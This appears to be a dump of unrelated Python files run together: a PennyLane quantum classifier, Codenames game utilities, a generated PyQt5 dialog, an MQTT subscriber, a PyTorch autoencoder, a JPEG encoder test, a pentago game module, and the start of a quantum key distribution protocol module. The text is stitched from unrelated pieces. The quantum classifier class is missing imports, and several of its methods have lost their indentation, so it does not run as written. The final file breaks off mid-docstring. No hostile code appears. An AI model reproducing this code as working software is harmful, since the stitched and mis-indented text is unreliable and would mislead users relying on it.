import matplotlib.pyplot as plt
from . import feature_maps as fm
from . import variational_forms as vf
from .terminal_colors import tcols
class VQC:
    def __init__(self, qdevice: pnl.device, hpars: dict):
        """
        Variational quantum circuit, implemented using the pennylane python
        package. This is a trainable quantum circuit. It is composed of a feature
        map and a variational form, which are implemented in their eponymous
        files in the same directory.
        Args:
            qdevice: String containing what kind of device to run the
                quantum circuit on: simulation, or actual computer?
            hpars: Dictionary of the hyperparameters to configure the vqc.
        """
        # Default hyperparameters; only keys present in BOTH this dict and
        # `hpars` are overridden, so unknown user keys are silently ignored.
        self._hp = {
            "hybrid": False,
            "nqubits": 4,
            "nfeatures": 16,
            "fmap": "zzfm",
            "vform": "two_local",
            "vform_repeats": 4,
            "optimiser": "adam",
            "lr": 0.001,
            "batch_size": 128,
            "ae_model_path": "none"
        }
        self._hp.update((k, hpars[k]) for k in self._hp.keys() & hpars.keys())
        self._qdevice = qdevice
        # Number of data re-uploading layers = nfeatures / nqubits (validated).
        self._layers = self._check_compat(self._hp["nqubits"], self._hp["nfeatures"])
        self._nweights = vf.vforms_weights(
            self._hp["vform"], self._hp["vform_repeats"], self._hp["nqubits"]
        )
        # Fixed seed so the initial weights are reproducible across runs.
        np.random.seed(123)
        self._weights = 0.01 * np.random.randn(
            self._layers, self._nweights, requires_grad=True
        )
        self._diff_method = self._select_diff_method(hpars)
        self._optimiser = self._choose_optimiser(self._hp["optimiser"], self._hp["lr"])
        self._class_loss_function = self._shift_bce
        # Early-stopping bookkeeping and loss history.
        self._epochs_no_improve = 0
        self._best_valid_loss = 999
        self.all_train_loss = []
        self.all_valid_loss = []
        # Bind the raw circuit function to the device as a differentiable QNode.
        self._circuit = pnl.qnode(self._qdevice, diff_method=self._diff_method)(
            self._qcircuit
        )
    def _qcircuit(self, inputs, weights):
        """
        The quantum circuit builder.
        @inputs :: The inputs taken by the feature maps.
        @weights :: The weights of the variational forms used.
        returns :: Measurement of the first qubit of the quantum circuit.
        """
        # Data re-uploading: each layer encodes the next `nqubits` features
        # with a ZZ feature map, then applies a trainable two-local ansatz.
        for layer_nb in range(self._layers):
            start_feature = layer_nb * self._hp["nqubits"]
            end_feature = self._hp["nqubits"] * (layer_nb + 1)
            fm.zzfm(self._hp["nqubits"], inputs[start_feature:end_feature])
            vf.two_local(
                self._hp["nqubits"],
                weights[layer_nb],
                repeats=self._hp["vform_repeats"],
                entanglement="linear",
            )
        # Pauli-Z expectation on qubit 0 is the classifier output.
        return pnl.expval(pnl.PauliZ(0))
    # Read-only accessors over the configuration and trained state.
    @property
    def nqubits(self):
        return self._hp["nqubits"]
    @property
    def nfeatures(self):
        return self._hp["nfeatures"]
    @property
    def circuit(self):
        return self._circuit
    @property
    def subforms(self):
        # NOTE(review): self._subforms is never assigned anywhere in this
        # class, so accessing this property raises AttributeError — confirm
        # whether it is dead code or should expose something else.
        return self._subforms
    @property
    def nweights(self):
        return self._nweights
    @property
    def best_valid_loss(self):
        return self._best_valid_loss
    @property
    def total_weights(self):
        # Total trainable parameters across all re-uploading layers.
        return self._nweights*self._layers
    def _draw(self):
        """
        Draws the circuit using dummy parameters.
        Parameterless implementation is not yet available in pennylane,
        and it seems not feasible either by the way pennylane is constructed.
        """
        drawing = pnl.draw_mpl(self._circuit)
        fig, ax = drawing([0] * int(self._hp["nfeatures"]), self._weights)
        return fig, ax
@staticmethod
def _check_compat(nqubits, nfeatures):
"""
Checks if the number of features in the dataset is divisible by
the number of qubits.
@nqubits :: Number of qubits assigned to the vqc.
@nfeatures :: Number of features to process by the vqc.
"""
if nfeatures % nqubits != 0:
raise ValueError(
"The number of features is not divisible by "
"the number of qubits you assigned!"
)
return int(nfeatures / nqubits)
@staticmethod
def _select_diff_method(hpars: dict) -> str:
"""Checks if a differentiation method for the quantum circuit is specified
by the user. If not, 'best' is selected as the differentiation method.
Args:
args: Arguments given to the vqc by the user, specifiying various hps.
Returns:
String that specifies which differentiation method to use.
"""
if "diff_method" in hpars:
return hpars["diff_method"]
return "best"
    @staticmethod
    def _choose_optimiser(choice, lr):
        """
        Choose an optimiser to use in the training of the vqc.
        @choice :: String of the optimiser name you want to use to train vqc.
        @lr :: Learning rate for the optimiser.
        """
        if choice is None:
            return None
        # Dispatch table; lambdas defer construction until a choice is made.
        switcher = {
            "adam": lambda: AdamOptimizer(stepsize=lr),
            "none": lambda: tcols.WARNING + "No Optimiser" + tcols.ENDC
        }
        optimiser = switcher.get(choice, lambda: None)()
        if optimiser is None:
            raise TypeError("Specified optimiser is not an option atm!")
        print(tcols.OKGREEN + "Optimiser used in this run: " + tcols.ENDC)
        print(optimiser, '\n')
        return optimiser
def _early_stopping(self, early_stopping_limit) -> bool:
"""
Stops the training if there has been no improvement in the loss
function during the past, e.g. 10, number of epochs.
returns :: True for when the early stopping limit was exceeded
and false otherwise.
"""
if self._epochs_no_improve >= early_stopping_limit:
return 1
return 0
    def forward(self, x_data):
        """Evaluate the quantum circuit on every sample in x_data."""
        return [self._circuit(x, self._weights) for x in x_data]
    def _shift_bce(self, y_preds, y_batch):
        """Shift the input given to this method and then calculate the binary cross
        entropy loss.
        Args:
            y_preds: The predictions made by the vqc on the data.
            y_batch: Batch of the target array.
        Returns:
            The binary cross entropy loss computed on the given data.
        """
        # Map circuit outputs from [-1, 1] to probabilities in [0, 1].
        y_preds = (np.array(y_preds) + 1)/2
        return self._binary_cross_entropy(y_preds, y_batch)
    @staticmethod
    def _binary_cross_entropy(y_preds, y_batch):
        """
        Binary cross entropy loss calculation.
        """
        # Clip predictions away from exactly 0/1 so the logs stay finite;
        # autograd's numpy (anp) keeps the computation differentiable.
        eps = anp.finfo(np.float32).eps
        y_preds = anp.clip(y_preds, eps, 1 - eps)
        y_batch = anp.array(y_batch)
        bce_one = anp.array(
            [y * anp.log(pred + eps) for pred, y in zip(y_preds, y_batch)]
        )
        bce_two = anp.array(
            [(1 - y) * anp.log(1 - pred + eps) for pred, y in zip(y_preds, y_batch)]
        )
        bce = anp.array(bce_one + bce_two)
        return -anp.mean(bce)
def compute_loss(self, x_batch, y_batch, weights=None):
"""
Objective function to be passed through the optimiser.
Weights is taken as an argument here since the optimiser func needs it.
We then use the class self variable inside the method.
"""
if not weights is None:
self._weights = weights
predictions = self.forward(x_batch)
return self._class_loss_function(predictions, y_batch)
    def _validate(self, valid_loader, outdir):
        """
        Calculate the loss on a validation data set.
        """
        x_valid, y_valid = valid_loader
        loss = self.compute_loss(x_valid, y_valid, self._weights)
        # Persist the weights whenever this loss beats the best seen so far.
        self._save_best_loss_model(loss, outdir)
        return loss
    def _train_batch(self, x_batch, y_batch):
        """
        Train on one batch.
        """
        x_batch = np.array(x_batch[:, :], requires_grad=False)
        y_batch = np.array(y_batch[:], requires_grad=False)
        # optimiser.step returns updated versions of all positional args;
        # only the weights (last argument) are trainable.
        _, _, weights = self._optimiser.step(
            self.compute_loss, x_batch, y_batch, self._weights
        )
        self._weights = weights
        loss = self.compute_loss(x_batch, y_batch, self._weights)
        return loss
    def _train_all_batches(self, train_loader, batch_seed):
        """
        Train on the full data set. Add randomness.
        """
        batch_loss_sum = 0
        nb_of_batches = 0
        x_train, y_train = train_loader
        for x_batch, y_batch in zip(x_train, y_train):
            # Shuffle each batch with its own seed so runs are reproducible.
            np.random.seed(batch_seed[nb_of_batches])
            perm = np.random.permutation(len(y_batch))
            x_batch = x_batch[perm]
            y_batch = y_batch[perm]
            batch_loss = self._train_batch(x_batch, y_batch)
            batch_loss_sum += batch_loss
            nb_of_batches += 1
        return batch_loss_sum / nb_of_batches
    def _print_total_weights(self):
        """Prints the total weights of the vqc model, to mimic the behaviour that is
        available out of the box for the pytorch counterpart of this hybrid vqc.
        """
        print("\n----------------------------------------")
        print(tcols.OKGREEN + "Total number of weights: " + tcols.ENDC +
              f"{self.total_weights}")
        print("----------------------------------------\n")
    def train_model(self, train_loader, valid_loader, epochs, estopping_limit, outdir):
        """Train an instantiated vqc algorithm.
        """
        self._print_total_weights()
        print(tcols.OKCYAN + "Training the vqc..." + tcols.ENDC)
        # Pre-draw one shuffling seed per (epoch, batch) for reproducibility.
        rng = np.random.default_rng(12345)
        batch_seeds = rng.integers(low=0, high=100,
                                   size=(epochs, len(train_loader[1])))
        for epoch in range(epochs):
            train_loss = self._train_all_batches(train_loader, batch_seeds[epoch])
            valid_loss = self._validate(valid_loader, outdir)
            if self._early_stopping(estopping_limit):
                break
            self.all_train_loss.append(train_loss)
            self.all_valid_loss.append(valid_loss)
            self._print_losses(epoch, epochs, train_loss, valid_loss)
    @staticmethod
    def _print_losses(epoch, epochs, train_loss, valid_loss):
        """
        Prints the training and validation losses in a nice format.
        @epoch :: Int of the current epoch.
        @epochs :: Int of the total number of epochs.
        @train_loss :: The computed training loss pytorch object.
        @valid_loss :: The computed validation loss pytorch object.
        """
        print(
            f"Epoch : {epoch + 1}/{epochs}, "
            f"Train loss (average) = {train_loss.item():.8f}"
        )
        print(f"Epoch : {epoch + 1}/{epochs}, " f"Valid loss = {valid_loss.item():.8f}")
    def loss_plot(self, outdir):
        """
        Plots the loss for each epoch for the training and validation data.
        @outdir :: Directory where to save the loss plot.
        """
        epochs = list(range(len(self.all_train_loss)))
        plt.figure()
        plt.plot(epochs, self.all_train_loss, color="gray", label="Train Loss (avg)")
        plt.plot(epochs, self.all_valid_loss, color="navy", label="Valid Loss")
        self._loss_plot_header(epochs, "blue", "white")
        plt.xlabel("Epochs")
        plt.ylabel("Loss")
        plt.savefig(os.path.join(outdir, "loss_epochs.pdf"))
        plt.close()
        print(tcols.OKGREEN + f"Loss plot was saved to {outdir}" + tcols.ENDC)
    def _loss_plot_header(self, epochs, writing_color, box_color):
        """The header of the loss plot, displaying the best obtained loss during the
        training of the vqc and the legend.
        Args:
            epochs (int): Number of epochs the vqc was training for.
            writing_color (str): Color of the writing in the header of the figure.
            box_color (str): Color of the box in which this header is put.
        """
        # Anchor the annotation at the top-left corner of the loss curves.
        plt.text(
            np.min(epochs),
            np.max(self.all_train_loss),
            f"Min: {self._best_valid_loss:.2e}",
            verticalalignment="top",
            horizontalalignment="left",
            color=writing_color,
            fontsize=15,
            bbox={"facecolor": box_color, "alpha": 0.8, "pad": 5},
        )
        plt.legend()
    def _save_best_loss_model(self, valid_loss, outdir):
        """
        Prints a message and saves the optimised model with the best loss.
        @valid_loss :: Float of the validation loss.
        @outdir :: Directory where the best model is saved.
        """
        if self._best_valid_loss > valid_loss:
            # New best epoch: reset the early-stopping counter and persist.
            self._epochs_no_improve = 0
            self._best_valid_loss = valid_loss
            print(tcols.OKGREEN + f"New min: {self.best_valid_loss:.2e}" + tcols.ENDC)
            if outdir is not None:
                np.save(outdir + "best_model.npy", self._weights)
        else:
            self._epochs_no_improve += 1
    def export_hyperparameters(self, outdir):
        """
        Saves the hyperparameters of the model to a json file.
        @outdir :: Directory where to save the json file.
        """
        file_path = os.path.join(outdir, "hyperparameters.json")
        params_file = open(file_path, "w")
        json.dump(self._hp, params_file)
        params_file.close()
        print(tcols.OKGREEN + f"Hyperparameters exported to {file_path}!" + tcols.ENDC)
    def export_architecture(self, outdir):
        """Saves a drawing of the circuit to a text file.
        Args:
            outdir: The output folder where the circuit file will be saved.
        """
        outfile = os.path.join(outdir, "circuit_architecture.pdf")
        fig, ax = self._draw()
        fig.savefig(outfile)
        print(tcols.OKGREEN + f"Architecture exported to {outfile}!" + tcols.ENDC)
def load_model(self, model_path):
"""
Loads the weights of a trained model saved in a numpy file.
@model_path :: Directory where a trained model was saved.
"""
if not os.path.exists(model_path):
raise FileNotFoundError("∄ path.")
self._weights = np.load(model_path)
    def predict(self, x_data) -> np.ndarray:
        """
        Compute the prediction of the vqc on a data array. The output is casted to
        a list because the test.py is designed to be model agnostic between VQC and
        HybridVQC. The predict function of the latter outputs 3 values, from which we
        want the last one, i.e., the classification branch output (see ae_classifier.py)
        @x_data :: Input array to pass through the vqc.
        returns :: The latent space of the ae and the reco data.
        """
        x_data = np.array(x_data[:, :], requires_grad=False)
        classification_output = self.forward(x_data)
        # Wrapped in a list so callers can uniformly take output[-1].
        return [classification_output]
# file: api/app/games/codenames/events/utils.py
"""
This module contains utility functions required by the Codenames game event handlers.
"""
import functools
import json
import random
from flask_socketio import emit
from flask_login import current_user
from sqlalchemy import func
from app import db
from app.games.codenames.models import (
CodenamesTeams,
CodenamesWords,
)
from .constants import NAMESPACE, TEAMS, STATE_KEYS, STATES
def player_distribution_is_valid(check_spymaster=True):
    """
    Checks if the distribution of players across both teams is valid.
    Args:
        check_spymaster (bool, optional): Set to false if the presence
            of spymaster does not need to be checked. Defaults to True.
    Returns:
        bool: True if the distribution is valid; False otherwise.
    """
    blue_team = CodenamesTeams.query.filter_by(
        room=current_user.room.codenames_room, team_name=TEAMS.BLUE
    ).first()
    red_team = CodenamesTeams.query.filter_by(
        room=current_user.room.codenames_room, team_name=TEAMS.RED
    ).first()
    if check_spymaster:
        if blue_team.spymaster is None or red_team.spymaster is None:
            return False
    # Each team needs at least two players, and team sizes may differ by
    # at most one player.
    if (
        len(blue_team.players) < 2
        or len(red_team.players) < 2
        or abs(len(blue_team.players) - len(red_team.players)) > 1
    ):
        return False
    return True
def create_word_list():
    """
    Get 25 random words from the corpus and send them to the players.
    """
    # Draw 25 random word cards; each card has two printable sides.
    words = (
        CodenamesWords.query.filter_by(variant="STANDARD")
        .order_by(func.random())
        .limit(25)
        .all()
    )
    # Pick a random side of each card.
    list_of_words = [
        word.front if random.getrandbits(1) else word.back for word in words
    ]
    current_user.room.codenames_room.words = json.dumps(list_of_words)
    db.session.commit()
    data = {}
    data["words"] = list_of_words
    data["turns"] = 0
    # 1 assassin (A), 7 neutrals (N), 8 blue (B), 8 red (R); the starting
    # team gets a 9th card appended below.
    grid_sequence = ["A"] + ["N"] * 7 + ["B"] * 8 + ["R"] * 8
    if random.getrandbits(1):
        current_user.room.codenames_room.state = STATES.BLUE_SPYMASTER
        state = STATES.BLUE_SPYMASTER
        grid_sequence += ["B"]
    else:
        current_user.room.codenames_room.state = STATES.RED_SPYMASTER
        state = STATES.RED_SPYMASTER
        grid_sequence += ["R"]
    if state == STATES.BLUE_SPYMASTER:
        data["blueLeft"] = 9
        data["redLeft"] = 8
    else:
        data["redLeft"] = 9
        data["blueLeft"] = 8
    # Broadcast the public game data (no grid) to everyone in the room.
    emit("game_data", data, room=current_user.room_id, namespace=NAMESPACE)
    random.shuffle(grid_sequence)
    grid = "".join(grid_sequence)
    current_user.room.codenames_room.grid = grid
    db.session.commit()
    data = dict()
    data["grid"] = grid
    emit("set_state", {STATE_KEYS.GAME_STATE: state}, room=current_user.room_id)
    # Only spymasters receive the secret grid; also set per-team counters.
    for team in current_user.room.codenames_room.teams:
        if team.spymaster_player is not None:
            emit("game_data", data, room=team.spymaster_player.user_data.sid)
        if (
            state == STATES.BLUE_SPYMASTER
            and team.team_name == TEAMS.BLUE
            or state == STATES.RED_SPYMASTER
            and team.team_name == TEAMS.RED
        ):
            team.words_left = 9
        else:
            team.words_left = 8
    db.session.commit()
def get_team_from_grid(grid_letter):
    """
    Utility function which returns the team name for a grid letter.
    Args:
        grid_letter (str): The letter in the grid possibly representing a team
    Returns:
        str: Team name if the team is valid; None otherwise
    """
    if grid_letter == "B":
        return TEAMS.BLUE
    if grid_letter == "R":
        return TEAMS.RED
    return None
def is_codenames_player(funct):
    """
    Decorator that ensures the method is called only by a codenames player.
    Args:
        funct (function): Function being decorated
    Returns:
        function: Decorated function which calls the original function
            if the user is a codenames player, and returns None otherwise
    """
    @functools.wraps(funct)
    def wrapper(*args, **kwargs):
        # Only authenticated users with an attached codenames player proceed.
        if current_user.is_authenticated and current_user.codenames_player is not None:
            return funct(*args, **kwargs)
        return None
    return wrapper
def is_spymaster(funct):
    """
    Decorator that ensures the method is called only by a spymaster.
    Args:
        funct (function): Function being decorated
    Returns:
        function: Decorated function which calls the original function
            if the user is a spymaster, and returns None otherwise
    """
    @functools.wraps(funct)
    def wrapper(*args, **kwargs):
        player = current_user.codenames_player
        # Proceed only when the caller is their team's spymaster.
        if player.team.spymaster_player == player:
            return funct(*args, **kwargs)
        return None
    return wrapper
def is_not_spymaster(funct):
    """
    Decorator that ensures the method is called only by a non-spymaster player.
    Args:
        funct (function): Function being decorated
    Returns:
        function: Decorated function which calls the original function
            if the user is not a spymaster, and returns None otherwise
    """
    @functools.wraps(funct)
    def wrapper(*args, **kwargs):
        player = current_user.codenames_player
        # Block the team's spymaster; everyone else may proceed.
        if player.team.spymaster_player == player:
            return None
        return funct(*args, **kwargs)
    return wrapper
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'measurement.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Measurement(object):
    """Auto-generated (pyuic5) UI for the Measurement dialog: three labelled
    line edits (repetitions, sample time, purge time) plus Advanced/Save
    buttons.  Regenerate from measurement.ui instead of editing by hand.
    """
    def setupUi(self, Measurement):
        Measurement.setObjectName("Measurement")
        Measurement.resize(337, 229)
        # NOTE(review): "reptitions" is a typo baked into the generated
        # object names; fixing it requires regenerating from the .ui file.
        self.label_reptitions = QtWidgets.QLabel(Measurement)
        self.label_reptitions.setGeometry(QtCore.QRect(20, 30, 161, 21))
        self.label_reptitions.setObjectName("label_reptitions")
        self.lineEdit_repetitions = QtWidgets.QLineEdit(Measurement)
        self.lineEdit_repetitions.setGeometry(QtCore.QRect(200, 30, 113, 20))
        self.lineEdit_repetitions.setObjectName("lineEdit_repetitions")
        self.label_sampleTime = QtWidgets.QLabel(Measurement)
        self.label_sampleTime.setGeometry(QtCore.QRect(20, 60, 161, 21))
        self.label_sampleTime.setObjectName("label_sampleTime")
        self.lineEdit_sampleTime = QtWidgets.QLineEdit(Measurement)
        self.lineEdit_sampleTime.setGeometry(QtCore.QRect(200, 60, 113, 20))
        self.lineEdit_sampleTime.setObjectName("lineEdit_sampleTime")
        self.label_purgeTime = QtWidgets.QLabel(Measurement)
        self.label_purgeTime.setGeometry(QtCore.QRect(20, 90, 161, 21))
        self.label_purgeTime.setObjectName("label_purgeTime")
        self.lineEdit_purgeTime = QtWidgets.QLineEdit(Measurement)
        self.lineEdit_purgeTime.setGeometry(QtCore.QRect(200, 90, 113, 20))
        self.lineEdit_purgeTime.setObjectName("lineEdit_purgeTime")
        self.pushButton_advanced = QtWidgets.QPushButton(Measurement)
        self.pushButton_advanced.setGeometry(QtCore.QRect(170, 190, 75, 23))
        self.pushButton_advanced.setObjectName("pushButton_advanced")
        self.pushButton_save = QtWidgets.QPushButton(Measurement)
        self.pushButton_save.setGeometry(QtCore.QRect(250, 190, 75, 23))
        self.pushButton_save.setObjectName("pushButton_save")
        self.retranslateUi(Measurement)
        QtCore.QMetaObject.connectSlotsByName(Measurement)
    def retranslateUi(self, Measurement):
        # Set all user-visible strings through Qt's translation machinery.
        _translate = QtCore.QCoreApplication.translate
        Measurement.setWindowTitle(_translate("Measurement", "Measurement"))
        self.label_reptitions.setText(_translate("Measurement", "Number of repetitions"))
        self.label_sampleTime.setText(_translate("Measurement", "Sample time (seconds)"))
        self.label_purgeTime.setText(_translate("Measurement", "Purge time (seconds)"))
        self.pushButton_advanced.setText(_translate("Measurement", "Advanced"))
        self.pushButton_save.setText(_translate("Measurement", "Save"))
'''
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Measurement = QtWidgets.QWidget()
ui = Ui_Measurement()
ui.setupUi(Measurement)
Measurement.show()
sys.exit(app.exec_())
'''
# file: server/pythonScripts/subscriber.py
# MQTT subscriber: connect to a local broker, subscribe to one topic and
# disconnect after the first message is received.
import paho.mqtt.client as paho
# NOTE(review): paramiko and json are imported but never used here.
import paramiko
import json
broker = "localhost"
topic = "new"
port = 1883
def on_connect(client, userdata, flags, rc):  # Called when the client connects to the broker.
    # rc is the connection result code; nothing to do on success.
    x = 0
def on_message(client, userdata, message):
    # Print the decoded payload, then stop the loop by disconnecting
    # (loop_forever returns once disconnect() is called).
    msg = str(message.payload.decode("utf-8"))
    print(msg)
    client.disconnect()
client = paho.Client("user5")  # Create the client object.
client.on_connect = on_connect
client.on_message = on_message
# Establish the connection with the broker (default MQTT port 1883).
client.connect(broker, 1883)
client.subscribe(topic)
# Block, dispatching network events, until on_message disconnects.
client.loop_forever()
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
class Autoencoder(nn.Module):
    """Convolutional autoencoder for 3-channel images: two 5x5 convolutions
    down to 16 feature maps, mirrored by two transposed convolutions back
    to 3 channels, so the output has the same spatial size as the input.
    """

    def __init__(self):
        super(Autoencoder, self).__init__()
        self.encoder = nn.Sequential(
            nn.Conv2d(3, 6, kernel_size=5),
            nn.ReLU(True),
            nn.Conv2d(6, 16, kernel_size=5),
            nn.ReLU(True),
        )
        self.decoder = nn.Sequential(
            nn.ConvTranspose2d(16, 6, kernel_size=5),
            nn.ReLU(True),
            nn.ConvTranspose2d(6, 3, kernel_size=5),
            nn.ReLU(True),
        )

    def forward(self, x):
        # Encode then decode in one expression; identical data flow to
        # assigning the intermediate to x twice.
        return self.decoder(self.encoder(x))
def main():
    """Placeholder entry point; the model above is meant to be imported."""
    pass
if __name__ == "__main__":
    main()
# source repo: haribommi/vaapi-fits
###
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ..util import *
from .encoder import EncoderTest
spec = load_test_spec("jpeg", "encode")
class JPEGEncoderTest(EncoderTest):
    """Base class for JPEG/MJPEG encode tests: configures the gstreamer
    vaapi encode/decode elements before delegating to EncoderTest."""
    def before(self):
        # Inject the jpeg-specific pipeline settings as instance attributes.
        vars(self).update(
            codec = "jpeg",
            gstencoder = "vaapijpegenc",
            gstdecoder = "jpegparse ! vaapijpegdec",
            gstmediatype = "image/jpeg",
            gstparser = "jpegparse",
            profile = "baseline",
        )
        super(JPEGEncoderTest, self).before()
    def get_file_ext(self):
        # Multi-frame output is a motion-jpeg stream, single frame a still.
        return "mjpeg" if self.frames > 1 else "jpg"
class cqp(JPEGEncoderTest):
    """Constant-QP (quality-driven) JPEG encode test, parametrized over the
    cases/quality values declared in the test spec."""
    @platform_tags(JPEG_ENCODE_PLATFORMS)
    @slash.requires(*have_gst_element("vaapijpegenc"))
    @slash.requires(*have_gst_element("vaapijpegdec"))
    @slash.parametrize(*gen_jpeg_cqp_parameters(spec))
    def test(self, case, quality):
        # Merge the per-case spec, then the per-run parameters, and encode.
        vars(self).update(spec[case].copy())
        vars(self).update(
            case = case,
            quality = quality,
            rcmode = "cqp",
        )
        self.encode()
#GamePlay.py
#<NAME>, <NAME>, <NAME>
"""This module contains the functions needed to support pentago gameplay.
A pentago gameboard is represented by a 6x6 2D array. Each location on the board is initialized to "" and is set
to 0 or 1 when the player or the AI respectively places a marble on that location. Each array in the gameboard
nested array represents a column of the board. Thus the gameboard can be viewed as the square in the 1st coordinate
quadrant with x and y coordinates ranging from 0...5. For example, the bottom right location on the gameboard can
be accessed with the command board[5][0]. The four squares on the board are indexed 1...4 with 1 as bottom left, 2 as
top left, 3 as bottom right, and 4 as top right. """
def new_board():
    """Return an empty 6x6 pentago board; every cell is a single space."""
    # Build each column independently so no rows are aliased.
    return [[" " for _ in range(6)] for _ in range(6)]
def printBoard(board):
    """prints out the board in a legible format

    Rows are printed top (y=5) to bottom (y=0); ANSI escapes draw the bold
    quadrant borders and the small square-index legend (2|4 over 1|3) on
    the right-hand side of rows 3 and 2.
    """
    print("\033[1m -----------------------------------\033[0m")
    print("5 \033[1m| \033[0m" + returnMarble(str(board[0][5])) + "  |  " + returnMarble(str(board[1][5])) + "  |  " + returnMarble(str(board[2][5])) +
          "\033[1m  |  \033[0m" + returnMarble(str(board[3][5])) + "  |  " + returnMarble(str(board[4][5])) + "  |  " + returnMarble(str(board[5][5])) +"\033[1m |\033[0m")
    print("  \033[1m|\033[0m-----------------\033[1m|\033[0m-----------------\033[1m|\033[0m")
    print("4 \033[1m| \033[0m" +returnMarble(str(board[0][4])) + "  |  " + returnMarble(str(board[1][4])) + "  |  " + returnMarble(str(board[2][4])) +
          "\033[1m  |  \033[0m" + returnMarble(str(board[3][4])) + "  |  " + returnMarble(str(board[4][4])) + "  |  " + returnMarble(str(board[5][4]))+"\033[1m |\033[0m")
    print("  \033[1m|\033[0m-----------------\033[1m|\033[0m-----------------\033[1m|\033[0m")
    print("3 \033[1m| \033[0m" +returnMarble(str(board[0][3])) + "  |  " + returnMarble(str(board[1][3])) + "  |  " + returnMarble(str(board[2][3])) +
          "\033[1m  |  \033[0m" + returnMarble(str(board[3][3])) + "  |  " + returnMarble(str(board[4][3])) + "  |  " + returnMarble(str(board[5][3]))+"\033[1m |\033[0m      2 | 4 ")
    print("\033[1m  |-----------------|-----------------|\033[0m   --|-- ")
    print("2 \033[1m| \033[0m" +returnMarble(str(board[0][2])) + "  |  " + returnMarble(str(board[1][2])) + "  |  " + returnMarble(str(board[2][2])) +
          "\033[1m  |  \033[0m" + returnMarble(str(board[3][2])) + "  |  " + returnMarble(str(board[4][2])) + "  |  " + returnMarble(str(board[5][2]))+"\033[1m |\033[0m      1 | 3 ")
    print("  \033[1m|\033[0m-----------------\033[1m|\033[0m-----------------\033[1m|\033[0m")
    print("1 \033[1m| \033[0m" + returnMarble(str(board[0][1])) + "  |  " + returnMarble(str(board[1][1])) + "  |  " + returnMarble(str(board[2][1])) +
          "\033[1m  |  \033[0m" + returnMarble(str(board[3][1])) + "  |  " + returnMarble(str(board[4][1])) + "  |  " + returnMarble(str(board[5][1]))+"\033[1m |\033[0m")
    print("  \033[1m|\033[0m-----------------\033[1m|\033[0m-----------------\033[1m|\033[0m")
    print("0 \033[1m| \033[0m" + returnMarble(str(board[0][0])) + "  |  " + returnMarble(str(board[1][0])) + "  |  " + returnMarble(str(board[2][0])) +
          "\033[1m  |  \033[0m" + returnMarble(str(board[3][0])) + "  |  " + returnMarble(str(board[4][0])) + "  |  " + returnMarble(str(board[5][0]))+"\033[1m |\033[0m")
    print("\033[1m -----------------------------------\033[0m")
    print("      0    1    2    3    4    5")
    return
def returnMarble(number):
    """Returns a string, red X for AI ("1"), plain X for the human player
    ("0"); any other value is returned unchanged (e.g. an empty cell)."""
    marbles = {"1": "\033[91mX\033[0m", "0": "X"}
    return marbles.get(number, number)
def rotate(board, direction, square_index):
    """Rotate one 3x3 quadrant of the board 90 degrees and return the board.

    NOTE(review): despite what earlier documentation suggested, the board is
    modified in place (the returned object is the same list) — confirm callers
    copy first if they need the original preserved.

    Parameter board: a valid pentago board (6x6, indexed board[column][row])
    Parameter direction: "R" or "L"; any other value leaves the board untouched
    Parameter square_index: which quadrant to rotate, int 1...4
    """
    # Map the quadrant index to the (column, row) origin of its 3x3 block.
    if square_index == 1:
        col_off, row_off = 0, 0
    if square_index == 2:
        col_off, row_off = 0, 3
    if square_index == 3:
        col_off, row_off = 3, 0
    if square_index == 4:
        col_off, row_off = 3, 3
    if direction in ("R", "L"):
        # Snapshot the quadrant, then write back the rotated permutation.
        old = [[board[col_off + c][row_off + r] for r in range(3)] for c in range(3)]
        for c in range(3):
            for r in range(3):
                if direction == "R":
                    board[col_off + c][row_off + r] = old[2 - r][c]
                else:
                    board[col_off + c][row_off + r] = old[r][2 - c]
    return board
def take_action(board, action, player):
    """Apply *action* to *board* for *player* and return the resulting board.

    NOTE(review): the board is modified in place — the local alias in the
    original ("temp = board") never copied it.  Confirm callers expect this.

    Parameter board: a valid game board
    Parameter action: an instance of type Action
    Parameter player: either "Player" or "AI"
    """
    # Human marbles are stored as 0, AI marbles as 1.
    marker = 0 if player == "Player" else 1
    board[action.x_coordinate][action.y_coordinate] = marker
    return rotate(board, action.direction, action.square_index)
class Action(object):
    """A single pentago move: marble placement plus a quadrant rotation.

    An action combines the board location for a new marble, the quadrant to
    rotate, and the rotation direction.
    """
    def __init__(self, x_coordinate, y_coordinate, square_index, direction):
        """Create an Action.

        Parameter x_coordinate: column for the marble, int 0...5
        Parameter y_coordinate: row for the marble, int 0...5
        Parameter square_index: quadrant to rotate, int 1...4
        Parameter direction: rotation direction, "R" or "L"
        """
        self.x_coordinate = x_coordinate
        self.y_coordinate = y_coordinate
        self.square_index = square_index
        self.direction = direction
    def equals(self, action):
        """Return True when *action* describes exactly the same move."""
        assert isinstance(action, Action)
        return ((self.x_coordinate, self.y_coordinate, self.square_index, self.direction)
                == (action.x_coordinate, action.y_coordinate, action.square_index, action.direction))
| StarcoderdataPython |
3515674 | <reponame>Doomsk/QChat
import abc
import random
import time
from qchat.device import LeadDevice, FollowDevice
from qchat.ecc import ECC_Golay
from qchat.log import QChatLogger
from qchat.messages import PTCLMessage, BB84Message, SPDSMessage, DQKDMessage
# Role identifiers used to coordinate which peer leads a two-party protocol.
LEADER_ROLE = 0
FOLLOW_ROLE = 1
# Seconds to wait for a peer control message before aborting a protocol.
IDLE_TIMEOUT = 60
# Bits per byte; used when converting reconciled bit lists into key bytes.
BYTE_LEN = 8
# Number of qubits distributed per BB84/DIQKD round.
ROUND_SIZE = 100
# Optimal quantum winning probability of the CHSH game, cos^2(pi/8).
PCHSH = 0.8535533905932737
# Maximum tolerable estimated error rate before aborting (3/23, matching the
# 23-bit Golay codewords used for reconciliation below).
MAX_GOLAY_ERROR = 0.13043478260869565
class ProtocolException(Exception):
    """Raised when a QChat protocol exchange fails, desynchronizes, or times out."""
    pass
class QChatProtocol(metaclass=abc.ABCMeta):
    """Abstract base for two-party quantum/classical exchange protocols."""
    def __init__(self, peer_info, connection, ctrl_msg_q, outbound_q, role, relay_info):
        """
        Initializes a protocol object that is used for executing quantum/classical exchange protocols
        :param peer_info: dict
            Dictionary containing host, ip, port information
